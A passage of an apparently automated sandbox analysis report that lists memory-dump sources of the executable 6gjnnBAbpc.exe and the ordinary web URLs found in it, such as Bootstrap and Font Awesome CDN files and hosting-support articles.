                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js?ver=1.0.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313435203.0000000005090000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.312893371.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308487014.0000000005190000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.421703966.000000000A6D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308212580.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://static.minne.com/files/banner/minne_600x500
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313435203.0000000005090000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.312893371.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308487014.0000000005190000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.421703966.000000000A6D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308212580.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.lolipop.jp/hc/ja/articles/360049132953
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313435203.0000000005090000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.312893371.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.325578885.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tickets.suresupport.com/faq/article-1596/en
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/css/all.css
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/css/v4-shims.css
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.eot
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.eot?#iefix
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.svg#fontawesome
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.ttf
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.woff
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.woff2
